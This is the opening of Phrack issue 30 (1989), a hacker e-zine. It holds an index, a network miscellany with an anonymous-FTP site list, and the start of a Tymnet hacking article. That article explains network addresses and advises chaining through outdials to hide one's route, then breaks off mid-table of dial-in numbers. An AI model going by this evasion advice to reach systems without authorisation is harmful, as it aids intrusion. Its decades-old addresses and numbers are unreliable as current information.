4894 lines
215 KiB
Plaintext
4894 lines
215 KiB
Plaintext
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #1 of 12
|
|
|
|
Phrack Inc. Newsletter Issue XXX Index
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
December 24, 1989
|
|
|
|
Welcome to Issue 30 of Phrack Inc. We are releasing this just a few short
|
|
days before the start of a new decade and proud to say that we will continue to
|
|
bring you more information well into the 1990s.
|
|
|
|
SummerCon 1990! That's right. Preliminary plans are being made right
|
|
now, so, starting with this issue, keep your eye on Phrack World News for
|
|
details! The dates have been decided so mark your calendars!
|
|
|
|
This issue of Phrack Inc. features a large article by Goe that contains
|
|
some information about VM/CMS which can, if used properly, be of great use.
|
|
Also in this issue, Jack T. Tab brings us a VAX/VMS version of the Fakemail
|
|
program that was featured for Unix in Phrack Inc. Volume Three, Issue 27, File
|
|
#8. Also, Network Miscellany III, compiled by Taran King, contains a
|
|
relatively large list of FTP sites that allow anonymous FTP for those of you
|
|
who have been poking and stabbing around the Internet. These along with all of
|
|
the rest of the articles should prove to be interesting reading for you!
|
|
|
|
Do you have access to the Wide Area Networks? Are you on Fidonet? How
|
|
about UUCP or CompuServe? If so, you can drop a line to us through the
|
|
networks at the addresses listed below. We'd love to hear from you!
|
|
|
|
Taran King & Knight Lightning
|
|
|
|
phrack@netsys.COM
|
|
...!netsys!phrack (phrack@netsys.UUCP)
|
|
phrack%netsys.COM@LLL-WINKEN.LLNL.GOV
|
|
phrack%netsys.COM@AMES.ARC.NASA.GOV
|
|
phrack%netsys.COM@RUTGERS.EDU
|
|
_______________________________________________________________________________
|
|
|
|
Table of Contents:
|
|
|
|
1. Phrack Inc. XXX Index by Taran King and Knight Lightning
|
|
2. Network Miscellany III by Taran King
|
|
3. Hacking & Tymnet by Synthecide
|
|
4. Hacking VM/CMS by Goe
|
|
5. The DECWRL Mail Gateway by Dedicated Link
|
|
6. Decnet Hackola : Remote Turist TTY (RTT) by *Hobbit*
|
|
7. VAX/VMS Fake Mail by Jack T. Tab
|
|
8. Consensual Realities in Cyberspace by Paul Saffo
|
|
9. The Truth About Lie Detectors by Razor's Edge
|
|
10. Western Union Telex, TWX, and Time Service by Phone Phanatic
|
|
11-12 Phrack World News XXX/Parts 1-2 by Knight Lightning
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #2 of 12
|
|
|
|
Network Miscellany III
|
|
~~~~~~~~~~~~~~~~~~~~~~
|
|
By Taran King
|
|
|
|
With Extra Special Thanks To
|
|
|
|
Dark OverLord
|
|
|
|
December 24, 1989
|
|
|
|
|
|
CARL
|
|
~~~~
|
|
The Colorado Alliance of Research Libraries, or CARL, is an on-line service
|
|
providing information from its member libraries as well as select information
|
|
databases. The member libraries include Auraria, CU Health Sciences Center, CU
|
|
Law Library, Denver Public Library, Denver University, Denver University Law
|
|
School, Colorado School of Mines, University of Northern Colorado, University
|
|
of Wyoming, Government Publications, plus about five community colleges, Regis
|
|
College, Colorado State Publications, State Department of Education, Pikes Peak
|
|
Library, MARMOT Library System, and Boulder Public Library. The information
|
|
databases include the following: UnConver -- Article Access, "Facts,"
|
|
Encyclopedia, Metro Denver Facts, Info Colorado, Boston Library Consortium,
|
|
Library News, and New Journal Issues.
|
|
|
|
CARL is available via Telnet at PAC.CARL.ORG (192.54.81.128) and is pretty
|
|
clear to understand. The Encyclopedia information database, unfortunately,
|
|
requires a valid username on the system.
|
|
|
|
|
|
COMPUSERVE ACCESS VIA INTERNET
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
You can access CompuServe via Telnet through the gateway/concentrator at
|
|
CTS.MERIT.EDU (35.1.1.6) by typing "CompuServe" at the "Which Host?" prompt.
|
|
|
|
CTS.MERIT.EDU (35.1.1.6) is a Cisco terminal server installed primarily for
|
|
users of the Merit computer network in Michigan. This machine has a bunch of
|
|
serial lines going in each direction to/from a Merit Secondary Communications
|
|
Processor (SCP), which is the entity that gives you the "Which Host?" prompt.
|
|
|
|
Some other of the Merit services (like outbound Telnet from "Which Host?") have
|
|
been intentionally limited so that they only work within Merit. Part of this
|
|
is apparently for reasons of accountability and security (no random hackers
|
|
dialing in and hacking machines in New Zealand) and part is for access control
|
|
(ports are scarce and services have costs so they try to limit who uses the
|
|
thing to paying customers).
|
|
|
|
CompuServe bills connections via this link as if it were via Telenet (which is
|
|
EXPENSIVE!). It's an X.25 connection somewhere at a decently fast speed.
|
|
|
|
If you have particular questions about all of the various services that can be
|
|
accessed through Merit, either through the terminal server at CTS.MERIT.EDU
|
|
(35.1.1.6), Telneting directly into a Merit SCP or PCP, or via dial-up access,
|
|
contact merit_computer_network@UM.CC.UMICH.EDU or INFO@MERIT on Bitnet.
|
|
|
|
For more details about what can be accessed via CTS.MERIT.EDU, stay tuned to
|
|
Network Miscellany for part IV in an upcoming issue of Phrack!
|
|
|
|
|
|
DATE AND TIME
|
|
~~~~~~~~~~~~~
|
|
Here's an interesting little trick. Just in case you are on some system
|
|
without the ability to report what time it is by a command, connect via Telnet
|
|
to port 13 of an Internet Unix system. This gives you the time and date and
|
|
then disconnects. Some example systems of this include RUTGERS.EDU,
|
|
MICA.BERKELEY.EDU, UCBVAX.BERKELEY.EDU, and PIKES.COLORADO.EDU (example:
|
|
Telnet RUTGERS.EDU 13).
|
|
|
|
|
|
FTP
|
|
~~~
|
|
File Transfer Protocol or FTP is a way to transfer data or text files over the
|
|
Internet from remote sites. The only problem is figuring out where something
|
|
is that you want to get.
|
|
|
|
The following is a list of sites accepting anonymous FTP user=anonymous,
|
|
password=login. It was compiled by Jon Granrose with the help of a number of
|
|
contributors as well as a couple of lists that had been started. If you have
|
|
any comments, additions, or corrections, mail them to odin@UCSCB.UCSC.EDU or
|
|
odin@ucscb.UUCP or 74036.3241@COMPUSERVE.COM.
|
|
|
|
-------------------------------------------------------------------------------
|
|
System name IP Address Comments
|
|
-------------------------------------------------------------------------------
|
|
a.cs.uiuc.edu 128.174.5.20 TeX, dvi2ps, gif, texx2.7, amiga
|
|
accuvax.nwu.edu 129.105.49.1 PibTerm 4.1.3
|
|
ahwahnee.stanford.edu 36.56.0.208 pcip interface specs
|
|
ai.toronto.edu 128.100.1.65 SunOS4.0 SLIP beta,
|
|
R3 xwebster fixes
|
|
albanycs.albany.edu 128.204.1.4 Best of comp.graphics
|
|
allspice.lcs.mit.edu 18.26.0.115 RFC1056 (PCMAIL) stuff, MIT snmp
|
|
ames.arc.nasa.gov 128.102.18.3 pcrrn, gnu grep
|
|
arisia.xerox.com 13.1.100.206 lisp, tcp/ip, IDA sendmail kit
|
|
arizona.edu 128.196.6.1 Icon, SR, SBProlog languages
|
|
arthur.cs.purdue.edu 128.10.2.1 RCS, Purdue tech reports
|
|
athena-dist.mit.edu 18.71.0.38 Hesiod name server, Kerberos, moira
|
|
bitsy.mit.edu 18.72.0.3 MIT worm paper
|
|
brownvm.brown.edu 128.148.128.40 MAC
|
|
bu-cs.bu.edu 128.197.2.1 Telecom
|
|
bu-it.bu.edu 128.197.2.40 Lots of interesting things.
|
|
bugs.nosc.mil 128.49.0.1 Minix
|
|
c.isi.edu 26.3.0.103 info-ibmpc (Tenex)
|
|
cadre.dsl.pittsburgh.edu 128.147.128.1 jove for the Mac
|
|
camelot.berkeley.edu 128.32.149.18 "pmake", yet another parallel make
|
|
cayuga.cs.rochester.edu 192.5.53.209 Xfig, LaTeX style, Jove,
|
|
NL-KR mail list
|
|
celray.cs.yale.edu 128.36.0.25 ispell, dictionary
|
|
charon.mit.edu 18.80.0.13 perl+patches, xdvi
|
|
cheddar.cs.wisc.edu 128.105.2.113 Common Lisp stuff, X11 courier fonts
|
|
cheops.cis.ohio-state.edu 128.146.8.62 comp.sources.*, alt.sources
|
|
citi.umich.edu 35.1.128.16 pathalias, (not CITI MacIP), webster
|
|
clutx.clarkson.edu 128.153.4.3 Turbo C stuff, net kit
|
|
cmx.npac.syr.edu 128.230.7.8 Lots of stuff
|
|
cod.nosc.mil 128.49.16.5 birdlist, PCstuff
|
|
columbia.edu 10.3.0.89 NEST network simulation testbed
|
|
crocus.waterloo.edu 129.97.128.6 STEVIE (vi-clone) in /u/grwalter/ftp
|
|
cs.cmu.edu 128.2.222.173 screen, msdos interrupt list, zoo
|
|
(in /afs/cs.cmu.edu/user/ralf/pub)
|
|
cs.orst.edu 128.193.32.1 Xlisp
|
|
cs.rochester.edu 192.5.53.209 See cayuga.cs.rochester.edu
|
|
cs.utah.edu 128.110.4.21 A Tour of the Worm, amiga forth
|
|
csc.ti.com 128.247.159.141 Preliminary clx document
|
|
cunixc.cc.columbia.edu 128.59.40.130 MM mailer, Kermit, CAP/KIP
|
|
cygnusx1.cs.utk.edu 128.169.201.12 GCC, MM, Scheme
|
|
dartvax.dartmouth.edu 129.170.16.4 ??
|
|
decwrl.dec.com 128.45.1.1 No FTP; gatekeeper.dec.com
|
|
devvax.tn.cornell.edu 192.35.82.200 tn3270, gated
|
|
drizzle.cs.uoregon.edu 128.223.4.1 raytracing archive (markv)
|
|
dsrgsun.ces.cwru.edu 129.22.16.2 Minix, TOS atariST gcc from bammi
|
|
ecla.usc.edu 26.21.0.65 mg emacs
|
|
elbereth.rutgers.edu 128.6.4.61 /pub
|
|
emx.utexas.edu 128.83.1.33 /net.directory
|
|
expo.lcs.mit.edu 18.30.0.212 a home of X, portable bitmaps
|
|
f.ms.uky.edu 128.163.128.6 Lots of interesting things
|
|
flash.bellcore.com 128.96.32.20 Karn's RFC & IEN coll,
|
|
Latest NET bits
|
|
ftp.ncsa.uiuc.edu 128.174.20.50 NCSA Telnet source, Mathematica
|
|
gatekeeper.dec.com 128.45.9.52 X11, recipes, cron, map,
|
|
Larry Wall stuff
|
|
ghostwheel.andrew.cmu.edu 128.2.35.1 Hershey fonts
|
|
giza.cis.ohio-state.edu 128.146.8.61 X11R3, PEX
|
|
gpu.utcs.toronto.edu 128.100.100.1 Lots of stuff, pd ksh
|
|
grape.ecs.clarkson.edu 128.153.13.196 Opus BBS, ms-dos, graphics
|
|
gregorio.stanford.edu 36.8.0.11 vmtp-ip, ip-multicast
|
|
gtss.gatech.edu 128.61.4.1 amiga rexx stuff
|
|
hamlet.caltech.edu 192.12.19.3 Nansi (VMS)
|
|
hanauma.stanford.edu 36.51.0.16 Vplot graphical system
|
|
him1.cc.umich.edu 35.1.1.43 atari st (cd PC7:)
|
|
hipl.psych.nyu.edu 128.122.132.2 Jove in pub (v4.9 is latest)
|
|
hogg.cc.uoregon.edu 128.223.20.5 NorthWestNet site info
|
|
hotel.cis.ksu.edu 129.130.10.12 XBBS, msdos, U3G toolkit
|
|
hubcap.clemson.edu 192.5.219.1 GIF files, RFCs
|
|
husc6.harvard.edu 128.103.1.56 pcip, appleII archives, uumap copy
|
|
and soon the parts of the ucb tahoe
|
|
tape that are marked not-at&t
|
|
icec.andrew.cmu.edu 128.223.4.1 CMU Tutor, ICEC
|
|
ics.uci.edu 128.195.0.1 perfect hash function gen., web-to-c
|
|
indri.primate.wisc.edu 128.104.230.11 Macintosh Trans{Skel, Display, Edit}
|
|
ix1.cc.utexas.edu 128.83.1.21 amiga
|
|
ix2.cc.utexas.edu 128.83.1.29 amiga
|
|
iuvax.cs.indiana.edu 129.79.254.192 unix arc et al
|
|
j.cc.purdue.edu 128.210.0.3 c.s. {unix, x, amiga}, elm, uupc
|
|
jpl-devvax.jpl.nasa.gov 128.149.8.43 perl author
|
|
june.cs.washington.edu 128.95.1.4 TeXhax, dviapollo, SmallTalk, web2c
|
|
kampi.hut.fi 128.214.3.9 DES routines (unrestricted)
|
|
kolvi.hut.fi 128.214.3.7 Ham radio (FINLAND)
|
|
kuhub.cc.ukans.edu 129.237.1.10 VMS news
|
|
labrea.stanford.edu 36.8.0.47 dvips, paranoia
|
|
lambda.lanl.gov 128.165.4.4 Toolpack/1 for math sw in f77
|
|
lancaster.andrew.cmu.edu 128.2.13.21 CMU PCIP, RFC1073 telnetd,
|
|
RFC1048 bootp
|
|
larry.cs.washington.edu 128.95.1.7 Poker
|
|
lbl-csam.arpa 128.3.254.6 See rtsg.ee.lbl.gov
|
|
linc.cis.upenn.edu 128.91.2.8 psfig for ditroff, TeX
|
|
llnl-winken.llnl.gov 128.115.14.1 comp.sources.misc
|
|
louie.udel.edu 128.175.1.3 net.exe, minix, NORD<>LINK, MH,
|
|
amiga
|
|
m9-520-1.mit.edu 18.80.0.45 Xim (X image viewer)
|
|
maxwell.physics.purdue.edu 128.46.135.3 /pub/bible.tar.Z
|
|
mailrus.cc.umich.edu 35.1.1.26 This list, unix arc, apollo stuff
|
|
megaron.arizona.edu 192.12.69.1 See arizona.edu
|
|
mimsy.umd.edu 128.8.128.8 declarative languages bib, SLIP
|
|
monk.proteon.com 128.185.123.16 cc:mail to smtp gateway
|
|
mordred.cs.purdue.edu 128.10.2.2 X11R3
|
|
ncsuvx.ncsu.edu 128.109.153.1 Hack, Moria, Empire, Ogre
|
|
net1.ucsd.edu 128.54.0.10 macintosh (tenex)
|
|
nic.mr.net 192.12.250.5 Minnesota Regional Net traffic data
|
|
nic.ddn.mil 10.0.0.51 RFC, other network info in NETINFO:
|
|
nis.nsf.net 35.1.1.48 Merit info, NSFnet Link Letter
|
|
nisc.nyser.net 192.33.4.10 Nysernet, IETF, GOSIP
|
|
nl.cs.cmu.edu 128.2.222.56 Fuzzy Pixmap 0.84 in /usr/mlm/ftp
|
|
oddjob.uchicago.edu 128.135.4.2 NNTP, Sendmail, utils,
|
|
Ethernet stuff
|
|
omnigate.clarkson.edu 128.153.4.2 PS maps of the Domain Name system.
|
|
parcvax.xerox.com 13.1.100.206 See arisia.xerox.com
|
|
panarea.usc.edu 128.125.3.54 Archive for "maps"
|
|
pawl.rpi.edu 128.113.10.2 DVI stuff, Atari ST, vi for dos
|
|
plains.nodak.edu 192.33.18.50 ASCII pics, /pub/picture
|
|
po1.andrew.cmu.edu 128.2.11.131 ??
|
|
po2.andrew.cmu.edu 128.2.249.105 ??
|
|
postgres.berkeley.edu 128.32.149.1 University INGRES,
|
|
prep.ai.mit.edu 128.52.32.14 GNU, MIT C Scheme, gnu e?grep
|
|
radio.astro.utoronto.ca 128.100.75.4 UFGATE, msdos, lots
|
|
rascal.ics.utexas.edu 128.83.144.1 KCL, MAXIMA, GCC-386,
|
|
BoyerMoore prover
|
|
relgyro.stanford.edu 36.64.0.50 sunrast-to-pc
|
|
riacs.edu 128.102.16.8 SLIP
|
|
ringo.rutgers.edu 128.6.5.77 Omega sources
|
|
rtsg.ee.lbl.gov 128.3.254.68 flex
|
|
sally.cs.utexas.edu Networking stuff
|
|
sbcs.sunysb.edu 128.48.2.3 sun raster tools
|
|
scam.berkeley.edu 128.32.138.1 X sources, etc.
|
|
science.utah.edu 118.110.192.2 TeX things (tenex)
|
|
score.stanford.edu 36.8.0.46 TexHax, Atari (tenex)
|
|
sh.cs.net 192.31.103.3 Misc
|
|
shambhala.berkeley.edu xrn
|
|
sics.se 192.16.123.90 Ham radio (SWEDEN)
|
|
simtel20.arpa 26.0.0.74 See wsmr-simtel20.army.mil
|
|
spam.istc.sri.com 128.18.4.3 Gnu, more
|
|
sphere.mast.ohio-state.edu 128.146.7.200 phone (with bugs fixed)
|
|
squid.cs.ucla.edu 128.97.16.28 soc.med.aids
|
|
sri-nic.arpa 10.0.0.51 See nic.ddn.mil
|
|
ssyx.ucsc.edu 128.114.133.1 atari, amiga, gifs
|
|
sumex.stanford.edu 36.44.0.6 mac archives, Mycin (SUN4), imap
|
|
sumex-2060.stanford.edu 36.45.0.87 Old home of mac archives (tenex)
|
|
sun.cnuce.cnr.it 192.12.192.4 atalk, ka9q
|
|
sun.soe.clarkson.edu 128.153.12.3 Packet Driver, X11 fonts, TeX
|
|
surya.waterloo.edu 129.97.129.72 gifs, tiff format, gif2ras
|
|
stolaf.edu 130.71.128.1 news, anime, bitmaps
|
|
svax.cs.cornell.edu 128.84.254.2 TransFig, Fig-FS, NetHack
|
|
swan.ulowell.edu 129.63.224.1 sendmail, amiga, music, c.s. unix
|
|
thyme.lcs.mit.edu 18.26.0.94 SUPDUP
|
|
titan.rice.edu 128.42.1.30 sun-spots, amiga ispell
|
|
tmc.edu 128.249.1.1 FUBBS bbs list
|
|
topaz.rutgers.edu 128.6.4.194 amiga
|
|
trantor.harris-atd.com 26.13.0.98 contool, chuck@%s's tools
|
|
trantor.umd.edu 128.8.1.14 Network Time Protocol(NTP),
|
|
info-amiga
|
|
trwind.ind.trw.com 129.4.16.70 Turbo C src for net.exe
|
|
tumtum.cs.umd.edu 128.8.129.49 NeWS pd software
|
|
tut.cis.ohio-state.edu 128.146.8.60 GNU, lots of interesting things
|
|
ucbarpa.berkeley.edu 128.32.130.11 tn3270, pub/4.3
|
|
ucbvax.berkeley.edu 128.32.149.36 nntp, gnews, awm, empire
|
|
ucdavis.ucdavis.edu 128.120.2.1 ??
|
|
ucsd.edu 128.54.16.1u KA9Q archives, packet driver
|
|
umn-cs.cs.umn.edu 128.101.224.1 vectrex, mac, unix-pc
|
|
unmvax.unm.edu 129.24.12.128 getmaps,
|
|
unocss.unl.edu 129.93.1.11 alt.sex, motss
|
|
utadnx.cc.utexas.edu 128.83.1.26 VMS sources (zetaps, laser, sxlps)
|
|
uunet.uu.net 192.12.141.129 usenet archives, much more
|
|
ux.acss.umn.edu 128.101.63.2 usenix 87 archives
|
|
uxa.cso.uiuc.edu 128.174.2.1 mac, pcsig
|
|
uxc.cso.uiuc.edu 128.174.5.50 Games, misc
|
|
uxe.cso.uiuc.edu 128.174.5.54 amiga/Fish disks, PC-SIG 1-499
|
|
vax.ftp.com 128.127.25.100 FTP software, inc.
|
|
venera.isi.edu 128.9.0.32 statspy (NNstat)
|
|
venus.ycc.yale.edu 130.132.1.5 SBTeX
|
|
vgr.brl.mil 128.63.4.4 bsd ping + record route
|
|
venera.isi.edu 128.9.0.32 GNU Chess
|
|
watmath.waterloo.edu 129.97.128.1 Lots of stuff
|
|
wsmr-simtel20.army.mil 26.0.0.74 MS-DOS, Unix, CP/M, Mac, lots!
|
|
(tenex)
|
|
xanth.cs.odu.edu 128.82.8.1 c.srcs.{x, unix, misc, games,
|
|
amiga}, X10R4
|
|
zaphod.ncsa.uiuc.edu 128.174.20.50 NCSA Telnet source, binaries
|
|
z.andrew.cmu.edu 128.2.30.8 bugfixar + div
|
|
|
|
|
|
MELVYL ONLINE CATALOG
|
|
~~~~~~~~~~~~~~~~~~~~~
|
|
This service is provided by the University of California schools. It is
|
|
available via Telnet by connecting to MELVYL.UCOP.EDU (31.1.0.1). It basically
|
|
provides information searching capabilities and provides literary sources where
|
|
the "keyword" that you used may be found. It is relatively self-explanatory.
|
|
|
|
|
|
NAMESERVERS
|
|
~~~~~~~~~~~
|
|
By connecting to port 101 on certain Internet systems, you have connected to
|
|
the nameserver of that domain. To get a list of all of the subdomains of the
|
|
main domain, type ALL. A sample system is VIOLET.BERKELEY.EDU but be
|
|
forewarned that the output from typing ALL is *EXTREMELY* long on this
|
|
particular system! (Example: Telnet VIOLET.BERKELEY.EDU 101).
|
|
|
|
|
|
PUBLIC ACCESS UNIX INFORMATION
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
For those of you that are still interested in more information on the Public
|
|
Access Unix systems that were listed in Network Miscellany II featured in
|
|
Phrack 29, here are a few more details. For specific information concerning
|
|
the nodes discussed, refer to the previous article.
|
|
|
|
For those of you who are not local to a Public Access Unix system, Portal can
|
|
be reached via PC-Pursuit for $25 a month and a $10 access fee for "portal"
|
|
(off-peak). For information, contact John Little (jel@CUP.PORTAL.COM).
|
|
|
|
|
|
The Big Electric Cat (dasys1.UUCP) claims to be cheaper than most well-
|
|
connected public sites. They have special billing for "organizational"
|
|
accounts if you're interested and their standard rate is $5 a month for an
|
|
account (no time restrictions). The Big Electric Cat offers a superset of the
|
|
USENET newsgroups as well as unrestricted mail (!), a simplified set of prompts
|
|
for most system functions, games, and several other features
|
|
|
|
|
|
The World (WORLD.STD.COM) in Brookline, MA (Boston) is a Sun4/280 running
|
|
Sun/OS 4.0.3 (Unix.) They offer electronic mail (to most anyplace), USENET,
|
|
ClariNet and general Unix access. They dial UUNET and other sites frequently.
|
|
|
|
To create an account you just dial (617)739-WRLD (9753) and login as user "new"
|
|
(the login prompt gives instructions). They ask for some info (name, address,
|
|
etc.) and a MasterCard or Visa account.
|
|
|
|
Rates for The World
|
|
~~~~~~~~~~~~~~~~~~~
|
|
All times are East Coast, USA.
|
|
|
|
INITIAL SIGN-UP
|
|
$25.00 fee, applied to first month's charges.
|
|
BASIC ACCESS RATES
|
|
8AM-6PM $8.00/hour (Monday thru Friday)
|
|
6PM-12M $5.00/hour
|
|
12M-8AM $2.50/hour
|
|
Weekends and holidays, 8AM-12M, $5/hour.
|
|
|
|
Disk Quota
|
|
~~~~~~~~~~
|
|
A "byte" is equivalent to one character of storage.
|
|
A disk block is 1024 bytes.
|
|
First 512 disk blocks No Charge
|
|
Additional Quota $0.01/block/month
|
|
(approx. $10/MB/month)
|
|
Note that disk charges are based on your requested disk quota (system imposed
|
|
limit on your usage) and not your actual usage. Disk quota charges are
|
|
pro-rated.
|
|
|
|
Electronic Mail
|
|
~~~~~~~~~~~~~~~
|
|
No charge for electronic mail between users of The World. No charge for
|
|
first 512 blocks of mail per month. $0.01 per block of mail thereafter in
|
|
any given month (approx. $10/MB/month).
|
|
|
|
CPU Usage
|
|
~~~~~~~~~
|
|
In general, they do not charge for these resources for typical accounts
|
|
interested in electronic communications. Customers who wish to use their
|
|
system for compute or memory intensive applications should contact their
|
|
office for rates.
|
|
|
|
USENET
|
|
~~~~~~
|
|
Local usage, no charge. Network usage, no charge at this time.
|
|
|
|
Printing And Fax
|
|
~~~~~~~~~~~~~~~~
|
|
To be announced.
|
|
|
|
Upload or Download Software
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
No additional charge.
|
|
|
|
|
|
UNIVERSITY OF CALIFORNIA AT BERKELEY NETWORK INFORMATION
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
This is a service which I, personally, have found to be extremely useful. If
|
|
you need network information on virtually any system, connect to the University
|
|
of California at Berkeley Network Information at JADE.BERKELEY.EDU Port 117
|
|
(example: Telnet JADE.BERKELEY.EDU 117). Once you are logged into the system
|
|
automatically, it prompts you for a command or type "?" for a list of commands.
|
|
The help menu is relatively easy to understand. You can get Bitnet network
|
|
table listings or Internet numerical addresses or Internet mail exchanger
|
|
listings or UUCP node information or UUCP node paths plus more. It's very
|
|
useful in case you're having difficulty sending mail to a particular node from
|
|
your own node or if you're trying to connect to a system via FTP or Telnet that
|
|
your system doesn't recognize (i.e. get the numerical address from the server
|
|
and FTP or Telnet to the numerical address).
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #3 of 12
|
|
|
|
[-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
|
|
[-] [-]
|
|
[-] Hacking & Tymnet [-]
|
|
[-] [-]
|
|
[-] by [-]
|
|
[-] [-]
|
|
[-] Synthecide [-]
|
|
[-] [-]
|
|
[-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
|
|
|
|
|
|
There are literally hundreds of systems connected to some of these larger
|
|
networks, like Tymnet and Telenet. Navigation around these networks is very
|
|
simple, and usually well explained in their on-line documentation.
|
|
Furthermore, some systems will actually tell you what is connected and how to
|
|
get to it. In the case of Tymnet, after dialing in, at the log in prompt, type
|
|
"information" for the on-line documentation.
|
|
|
|
Accessing systems through networks is as simple as providing an address for it
|
|
to connect to. The best way to learn about the addresses and how to do things
|
|
on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was
|
|
in Issue 22, File 4 of 12, Volume Two (December 23, 1988). Some points are
|
|
re-iterated here.
|
|
|
|
Once on a network, you provide the NUA (network user address) of the system you
|
|
wish to connect to. NUAs are strings of 15 digits, broken up in to 3 fields,
|
|
the NETWORK ADDRESS, the AREA PREFIX, and the DNIC. Each field has 5 digits,
|
|
and are left padded with 0's where necessary.
|
|
|
|
The DNIC determines which network to take the address from. Tymnet, for
|
|
example, is 03106. 03110 is Telenet.
|
|
|
|
The AREA PREFIX and NETWORK ADDRESS determine the connection point. By
|
|
providing the address of the system that you wish to connect to, you will be
|
|
accessing it through the net... as if you were calling it directly. Obviously,
|
|
then, this provides one more level of security for access.
|
|
|
|
By connecting to an outdial, you can increase again the level of security you
|
|
enjoy, by using the outdial in that area to connect to the remote system.
|
|
|
|
Addendum -- Accessing Tymnet Over Local Packet Networks
|
|
|
|
This is just another way to get that extra step and/or bypass other routes.
|
|
This table is copied from Tymnet's on-line information. As said earlier, it's
|
|
a great resource, this on-line information!
|
|
|
|
BELL ATLANTIC
|
|
|
|
NODE CITY STATE SPEED ACCESS NUMBER NTWK
|
|
---- ------------------- -------------- ------ ------------ ----
|
|
03526 DOVER DELAWARE 300/2400 302/734-9465 @PDN
|
|
03526 GEORGETOWN DELAWARE 300/2400 302/856-7055 @PDN
|
|
03526 NEWARK DELAWARE 300/2400 302/366-0800 @PDN
|
|
03526 WILMINGTON DELAWARE 300/1200 302/428-0030 @PDN
|
|
03526 WILMINGTON DELAWARE 2400 302/655-1144 @PDN
|
|
|
|
|
|
06254 WASHINGTON DIST. OF COL. 300/1200 202/479-7214 @PDN
|
|
06254 WASHINGTON (MIDTOWN) DIST. OF COL. 2400 202/785-1688 @PDN
|
|
06254 WASHINGTON (DOWNTOWN) DIST. OF COL. 300/1200 202/393-6003 @PDN
|
|
06254 WASHINGTON (MIDTOWN) DIST. OF COL. 300/1200 202/293-4641 @PDN
|
|
06254 WASHINGTON DIST. OF COL. 300/1200 202/546-5549 @PDN
|
|
06254 WASHINGTON DIST. OF COL. 300/1200 202/328-0619 @PDN
|
|
|
|
06254 BETHESDA MARYLAND 300/1200 301/986-9942 @PDN
|
|
06254 COLESVILLE MARYLAND 300/2400 301/989-9324 @PDN
|
|
06254 HYATTSVILLE MARYLAND 300/1200 301/779-9935 @PDN
|
|
06254 LAUREL MARYLAND 300/2400 301/490-9971 @PDN
|
|
06254 ROCKVILLE MARYLAND 300/1200 301/340-9903 @PDN
|
|
06254 SILVER SPRING MARYLAND 300/1200 301/495-9911 @PDN
|
|
|
|
|
|
07771 BERNARDSVILLE NEW JERSEY 300/2400 201/766-7138 @PDN
|
|
07771 CLINTON NEW JERSEY 300-1200 201/730-8693 @PDN
|
|
07771 DOVER NEW JERSEY 300/2400 201/361-9211 @PDN
|
|
07771 EATONTOWN/RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN
|
|
07771 ELIZABETH NEW JERSEY 300/2400 201/289-5100 @PDN
|
|
07771 ENGLEWOOD NEW JERSEY 300/2400 201/871-3000 @PDN
|
|
07771 FREEHOLD NEW JERSEY 300/2400 201/780-8890 @PDN
|
|
07771 HACKENSACK NEW JERSEY 300/2400 201/343-9200 @PDN
|
|
07771 JERSEY CITY NEW JERSEY 300/2400 201/659-3800 @PDN
|
|
07771 LIVINGSTON NEW JERSEY 300/2400 201/533-0561 @PDN
|
|
07771 LONG BRANCH/RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN
|
|
07771 MADISON NEW JERSEY 300/2400 201/593-0004 @PDN
|
|
07771 METUCHEN NEW JERSEY 300/2400 201/906-9500 @PDN
|
|
07771 MIDDLETOWN NEW JERSEY 300/2400 201/957-9000 @PDN
|
|
07771 MORRISTOWN NEW JERSEY 300/2400 201/455-0437 @PDN
|
|
07771 NEWARK NEW JERSEY 300/2400 201/623-0083 @PDN
|
|
07771 NEW BRUNSWICK NEW JERSEY 300/2400 201/247-2700 @PDN
|
|
07771 NEW FOUNDLAND NEW JERSEY 300/2400 201/697-9380 @PDN
|
|
07771 PASSAIC NEW JERSEY 300/2400 201/473-6200 @PDN
|
|
07771 PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN
|
|
07771 PHILLIPSBURG NEW JERSEY 300/2400 201/454-9270 @PDN
|
|
07771 POMPTON LAKES NEW JERSEY 300/2400 201/835-8400 @PDN
|
|
07771 RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN
|
|
07771 RIDGEWOOD NEW JERSEY 300/2400 201/445-4800 @PDN
|
|
07771 SOMERVILLE NEW JERSEY 300/2400 201/218-1200 @PDN
|
|
07771 SOUTH RIVER NEW JERSEY 300/2400 201/390-9100 @PDN
|
|
07771 SPRING LAKE NEW JERSEY 300/2400 201/974-0850 @PDN
|
|
07771 TOMS RIVER NEW JERSEY 300/2400 201/286-3800 @PDN
|
|
07771 WASHINGTON NEW JERSEY 300/2400 201/689-6894 @PDN
|
|
07771 WAYNE/PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN
|
|
|
|
|
|
03526 ALLENTOWN PENNSYLVANIA 300/1200 215/435-0266 @PDN
|
|
11301 ALTOONA PENNSYLVANIA 300/1200 814/946-8639 @PDN
|
|
11301 ALTOONA PENNSYLVANIA 2400 814/949-0505 @PDN
|
|
03526 AMBLER PENNSYLVANIA 300/1200 215/283-2170 @PDN
|
|
10672 AMBRIDGE PENNSYLVANIA 300/1200 412/266-9610 @PDN
|
|
10672 CARNEGIE PENNSYLVANIA 300/1200 412/276-1882 @PDN
|
|
10672 CHARLEROI PENNSYLVANIA 300/1200 412/483-9100 @PDN
|
|
03526 CHESTER HEIGHTS PENNSYLVANIA 300/1200 215/358-0820 @PDN
|
|
03526 COATESVILLE PENNSYLVANIA 300/1200 215/383-7212 @PDN
|
|
